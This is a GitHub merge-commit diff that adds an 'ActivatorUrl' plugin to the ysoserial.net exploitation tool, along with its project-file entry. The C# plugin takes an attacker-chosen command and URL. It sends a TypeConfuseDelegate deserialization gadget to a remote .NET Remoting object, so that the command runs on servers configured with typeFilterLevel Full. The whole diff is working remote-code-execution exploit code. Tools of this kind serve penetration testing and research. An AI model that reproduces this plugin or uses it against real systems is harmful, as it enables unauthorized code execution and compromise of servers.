Merge pull request #43 from hantwister/master

Add ActivatorUrlPlugin v1
pwntester · Aug 17, 2019 · fd4a2f9 · fd4a2f9
2 parents 4f0e684 + d0474fd
commit fd4a2f9
Show file tree

Hide file tree

Showing 2 changed files with 82 additions and 0 deletions.
diff --git a/ysoserial/Plugins/ActivatorUrlPlugin.cs b/ysoserial/Plugins/ActivatorUrlPlugin.cs
@@ -0,0 +1,80 @@
+using System;
+using System.Collections.Generic;
+using System.Runtime.Remoting.Channels;
+using System.Runtime.Remoting.Channels.Tcp;
+using NDesk.Options;
+using ysoserial.Generators;
+
+namespace ysoserial.Plugins
+{
+    // Author: Harrison Neal
+    // Inspired by targets with BinaryServerFormatterSink.typeFilterLevel = Full
+    internal class ActivatorUrlPlugin : Plugin
+    {
+        private static string command = "";
+        private static string url = "";
+        private static bool secure;
+
+        private static readonly OptionSet options = new OptionSet
+        {
+            {"c|command=", "the command to be executed.", v => command = v},
+            {"u|url=", "the url passed to Activator.GetObject.", v => url = v},
+            {
+                "s", "if TCPChannel security should be enabled.", v =>
+                {
+                    if (v != null) secure = true;
+                }
+            }
+        };
+
+        public string Name()
+        {
+            return "ActivatorUrl";
+        }
+
+        public string Description()
+        {
+            return "Sends a generated payload to an activated, presumably remote, object";
+        }
+
+        public OptionSet Options()
+        {
+            return options;
+        }
+
+        public object Run(string[] args)
+        {
+            List<string> extra;
+            try
+            {
+                extra = options.Parse(args);
+
+                if (string.IsNullOrWhiteSpace(url)) throw new ArgumentException("A URL must be provided.");
+
+                if (string.IsNullOrWhiteSpace(command)) throw new ArgumentException("A command must be provided.");
+            }
+            catch (Exception e)
+            {
+                Console.Write("ysoserial: ");
+                Console.WriteLine(e.Message);
+                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
+                Environment.Exit(-1);
+            }
+
+            try
+            {
+                if (secure) ChannelServices.RegisterChannel(new TcpChannel(), true);
+
+                Activator.GetObject(typeof(MarshalByRefObject), url)
+                    .Equals(new TypeConfuseDelegateGenerator().TypeConfuseDelegateGadget(command));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine(e.ToString());
+                Console.WriteLine();
+            }
+
+            return "Payload already sent";
+        }
+    }
+}
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
@@ -58,6 +58,7 @@
       <SpecificVersion>False</SpecificVersion>
       <HintPath>dlls\Microsoft.PowerShell.Editor.dll</HintPath>
     </Reference>
+    <Reference Include="System.Runtime.Remoting" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Runtime.Serialization.Formatters.Soap" />
     <Reference Include="System.Transactions" />
@@ -88,6 +89,7 @@
     <Compile Include="Generators\PSObjectGenerator.cs" />
     <Compile Include="Generators\TypeConfuseDelegateGenerator.cs" />
     <Compile Include="Generators\WindowsIdentityGenerator.cs" />
+    <Compile Include="Plugins\ActivatorUrlPlugin.cs" />
     <Compile Include="Plugins\AltserializationPlugin.cs" />
     <Compile Include="Plugins\ApplicationTrustPlugin.cs" />
     <Compile Include="Plugins\ClipboardPlugin.cs" />